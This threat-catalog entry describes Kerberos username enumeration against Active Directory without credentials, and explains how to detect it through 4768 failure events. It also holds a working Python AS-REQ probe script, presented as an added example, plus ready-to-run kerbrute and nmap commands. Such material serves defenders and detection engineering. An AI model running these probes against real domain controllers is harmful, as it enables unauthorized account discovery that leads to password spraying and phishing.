UC0002: Domain user enumeration attack using the Kerberos protocol without a domain account

Summary

ID UC0002
Brief Description Attackers can carry out a domain user enumeration attack using the Kerberos authentication protocol without holding any domain credentials. Their purpose is usually to obtain valid usernames for further attacks (such as phishing or password spraying)
Author @ERMACK_COMMUNITY
Creation Date 2023/03/12
Modification Date 2023/03/12
ATT&CK Tactics
ATT&CK Techniques
Tags
  • Enumerate
  • Internal Attack
Linked Response Playbooks
Artifacts

Description

Artifact | Object | Description
Windows domain account | Attacked domain accounts | Domain accounts whose names the attacker is trying to discover
Host | Compromised host | Compromised host from which the attack is carried out
IP Address | Compromised host IP address | IP address from which the attack is carried out
Authentication Service | Authentication Service on a domain controller | Authentication Service on the domain controller to which the attacker sends KRB_AS_REQ messages
Kerberos network traffic | Kerberos protocol messages | Kerberos protocol messages generated during the attack (KRB_AS_REQ probes and the KDC's KRB_ERROR or KRB_AS_REP replies)

In this attack the attacker relies on a peculiarity of the Kerberos protocol: the Authentication Service answers an unauthenticated KRB_AS_REQ differently depending on whether the requested client principal exists, so the attacker can test whether a user with a given name exists in the domain without holding any credentials.

Attack prerequisites

  1. Network access to the Authentication Service (Kerberos, TCP or UDP port 88) on a domain controller; no domain account or password is required

Attack results

  1. One or more domain account usernames

Attack progress

Study

Username pattern definition

  1. Finding user email addresses (T1589.002)
  2. Finding usernames (T1589.003)
  3. Forming a hypothesis about the username pattern used in the domain (for example first.last, f.last or flast), based on the names collected

Choose usernames

  1. Selecting candidate usernames either from a generic wordlist (for example a list of common names) or from a list generated according to the hypothesised username pattern

Exploitation

Username guessing

  1. The attacker sends a KRB_AS_REQ message to the Authentication Service with the candidate username as the client principal (cname) and no pre-authentication data (empty padata).
  2. If the account exists, the Authentication Service answers with a KRB_ERROR carrying KDC_ERR_PREAUTH_REQUIRED (error code 25): the principal was found, but a KRB_AS_REQ with pre-authentication (an encrypted timestamp) is required to actually authenticate. If the account exists but pre-authentication is disabled for it, the KDC returns a full KRB_AS_REP instead, which confirms the name just as well.
  3. If no user with that name exists in the domain, the Authentication Service answers with KDC_ERR_C_PRINCIPAL_UNKNOWN (error code 6). Disabled, locked-out or expired accounts answer with KDC_ERR_CLIENT_REVOKED (error code 18), which still confirms that the name exists.

  No password is sent at any point, so the probes do not produce failed-logon events (4625) and do not count towards account lockout. On a Windows domain controller each probe of a nonexistent name is recorded as a Kerberos authentication ticket request failure (Event ID 4768, Result Code 0x6), which is the main detection signal: a burst of such failures for many different account names from one source address.
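
The exchange described in the three steps above, as an added example that is not part of the original page or of the kerbrute and nmap projects: a stand-alone Python 3 script (standard library only) that hand-encodes a KRB_AS_REQ without pre-authentication, sends it over TCP/88 and maps the reply (a KRB_AS_REP, or a KRB_ERROR with error code 25, 6 or 18) to a verdict about the username. The realm CONTOSO.LOCAL comes from the page's own tool examples; the host name dc01.contoso.local, the usernames and the constructed KRB_ERROR replies used for the offline demonstration are made up.

```python
# Hand-built Kerberos AS-REQ probe and KDC reply classifier (RFC 4120 encoding).
# Added example for this page, not code from ERMACK, kerbrute or nmap; stdlib only.
import socket
from datetime import datetime, timedelta, timezone

# --- minimal DER encoder: Kerberos only needs these universal types ---
def der_len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b

def tlv(tag, content): return bytes([tag]) + der_len(len(content)) + content
def ctx(n, content): return tlv(0xA0 | n, content)    # context-specific constructed [n]
def app(n, content): return tlv(0x60 | n, content)    # application constructed [n]
def seq(*items): return tlv(0x30, b"".join(items))
def kstring(s): return tlv(0x1B, s.encode("ascii"))   # KerberosString = GeneralString
def ktime(dt): return tlv(0x18, dt.strftime("%Y%m%d%H%M%SZ").encode("ascii"))  # KerberosTime

def integer(v):                # two's complement, minimal length (DER)
    n = 1
    while not -(1 << (8 * n - 1)) <= v < (1 << (8 * n - 1)):
        n += 1
    return tlv(0x02, v.to_bytes(n, "big", signed=True))

def principal(name_type, *parts):     # PrincipalName ::= SEQUENCE { name-type [0], name-string [1] }
    return seq(ctx(0, integer(name_type)), ctx(1, seq(*(kstring(p) for p in parts))))

NT_PRINCIPAL, NT_SRV_INST = 1, 2
KDC_ERR_C_PRINCIPAL_UNKNOWN, KDC_ERR_CLIENT_REVOKED, KDC_ERR_PREAUTH_REQUIRED = 6, 18, 25

def build_as_req(realm, username, nonce=0x5A5A5A5A, till=None):
    """AS-REQ with no padata: the KDC has to answer before the client shows any credential."""
    till = till or datetime.now(timezone.utc) + timedelta(days=1)
    body = seq(
        ctx(0, tlv(0x03, b"\x00" + (0x40800000).to_bytes(4, "big"))),  # KDCOptions: forwardable|renewable
        ctx(1, principal(NT_PRINCIPAL, username)),                       # cname: the name being probed
        ctx(2, kstring(realm)),
        ctx(3, principal(NT_SRV_INST, "krbtgt", realm)),                 # sname: krbtgt/REALM
        ctx(5, ktime(till)),
        ctx(7, integer(nonce)),
        ctx(8, seq(integer(18), integer(17), integer(23))),              # etypes: aes256, aes128, rc4-hmac
    )
    return app(10, seq(ctx(1, integer(5)), ctx(2, integer(10)), ctx(4, body)))  # [APPLICATION 10] AS-REQ

# --- minimal DER reader and reply classifier ---
def der_read(buf, pos=0):             # -> (tag, content, next_pos); single-byte tags only
    tag, first, pos = buf[pos], buf[pos + 1], pos + 2
    if first >= 0x80:                 # long-form length
        n = first & 0x7F
        first, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + first], pos + first

def der_children(content):
    out, pos = [], 0
    while pos < len(content):
        tag, val, pos = der_read(content, pos)
        out.append((tag, val))
    return out

def classify_reply(msg):
    """Map a raw KDC reply (AS-REP or KRB-ERROR) to what it reveals about the probed username."""
    tag, content, _ = der_read(msg)
    if tag == 0x6B:                   # [APPLICATION 11] AS-REP: account exists, no pre-auth required
        return "exists (no pre-authentication; AS-REP roastable)"
    if tag != 0x7E:                   # [APPLICATION 30] KRB-ERROR
        raise ValueError("not a KDC reply, tag 0x%02x" % tag)
    codes = [int.from_bytes(der_read(v)[1], "big", signed=True)
             for t, v in der_children(der_read(content)[1]) if t == 0xA6]  # [6] error-code
    if not codes:
        raise ValueError("KRB-ERROR without error-code")
    verdicts = {KDC_ERR_PREAUTH_REQUIRED: "exists",
                KDC_ERR_C_PRINCIPAL_UNKNOWN: "does not exist",
                KDC_ERR_CLIENT_REVOKED: "exists (disabled, locked out or expired)"}
    return verdicts.get(codes[0], "undetermined (KRB-ERROR %d)" % codes[0])

def probe(dc_host, realm, username, timeout=3.0):
    """Send one AS-REQ over TCP/88 (4-byte big-endian length prefix) and classify the answer."""
    req = build_as_req(realm, username)
    with socket.create_connection((dc_host, 88), timeout=timeout) as s, s.makefile("rb") as f:
        s.sendall(len(req).to_bytes(4, "big") + req)
        size = int.from_bytes(f.read(4), "big")
        return classify_reply(f.read(size))

def sample_krb_error(code, realm="CONTOSO.LOCAL"):
    """Constructed KRB-ERROR carrying the fields every KDC sends, so the classifier runs offline."""
    stime = datetime(2023, 3, 12, 12, 0, 0, tzinfo=timezone.utc)
    return app(30, seq(ctx(0, integer(5)), ctx(1, integer(30)), ctx(4, ktime(stime)),
                       ctx(5, integer(0)), ctx(6, integer(code)), ctx(9, kstring(realm)),
                       ctx(10, principal(NT_SRV_INST, "krbtgt", realm))))

if __name__ == "__main__":
    for user, code in (("alice", 25), ("zz_nobody", 6), ("svc_legacy", 18)):   # made-up names
        print(f"{user:12} -> {classify_reply(sample_krb_error(code))}")
    # Live use against a reachable DC (hypothetical host name):
    # print(probe("dc01.contoso.local", "CONTOSO.LOCAL", "alice"))
```

Run as-is, the script only exercises the classifier against the constructed KRB_ERROR replies; probe() is the live path and needs network reach to a domain controller. The 4-byte length prefix is the TCP framing the KDC expects on port 88; over UDP the same bytes go out without it. Note that the probe carries no password, which is why it leaves neither 4625 nor 4771 events, only a 4768 failure for unknown names.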

Some tools for carrying out this attack

  1. kerbrute (sends the KRB_AS_REQ probes directly and reports the names that answered KDC_ERR_PREAUTH_REQUIRED):

     ./kerbrute_linux_amd64 userenum --dc <domain_controller_ip_addr> -d contoso.local users.txt --output found_users.txt

  2. nmap with the krb5-enum-users NSE script:

     nmap -Pn -n -p88 --script krb5-enum-users --script-args krb5-enum-users.realm='contoso.local',userdb='users.txt' <domain_controller_ip_addr>

References

  1. https://labs.hakaioffsec.com/kerberos-enum-purple-vision/
  2. https://ardent101.github.io/posts/kerberos_general_attacks/
  3. https://github.com/ropnop/kerbrute
  4. https://github.com/nmap/nmap/blob/master/scripts/krb5-enum-users.nse